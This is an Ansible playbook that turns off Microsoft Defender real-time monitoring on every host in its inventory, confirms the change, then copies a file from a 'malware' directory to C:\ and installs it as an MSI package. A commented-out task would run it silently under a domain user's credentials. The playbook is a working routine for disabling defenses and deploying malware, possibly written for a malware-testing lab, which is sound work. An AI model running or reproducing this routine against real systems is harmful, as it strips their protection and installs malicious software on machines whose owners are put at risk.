---
- name: Check Realtime Monitoring
  hosts: all

  tasks:
  - name: Disable realtime monitoring
    ansible.windows.win_powershell:
      script: |
        Set-MpPreference -DisableRealtimeMonitoring $true

  - name: Checking Defender Settings
    ansible.windows.win_powershell:
      script: |
        $Preferences = Get-MpPreference
        $Preferences.DisableRealtimeMonitoring
    register: host_out

  - name: Copies the Malware
    ansible.windows.win_copy:
      src: ~/ansible/malware/{{ malware_name }}
      dest: C:\{{ malware_name }}
      force: yes

#  - name: Run The Malware
#    ansible.windows.win_command: 'msiexec /q /i C:\"{{ malware_name }}"'
#    become: yes
#    become_method: runas
#    become_user: "{{ usr_name }}@{{ domain_name }}"
#    become_flags: logon_type=batch
#    vars:
#      ansible_become_pass: "{{ passwd_pfx + usr_passwd }}"
#    args:
#      chdir: C:\
#    async: 10
#    poll: 0
#    register: command_output

  - name: Install an MSI file
    win_package:
      path: C:\{{ malware_name }}
      state: present

  - debug:
      var: command_output
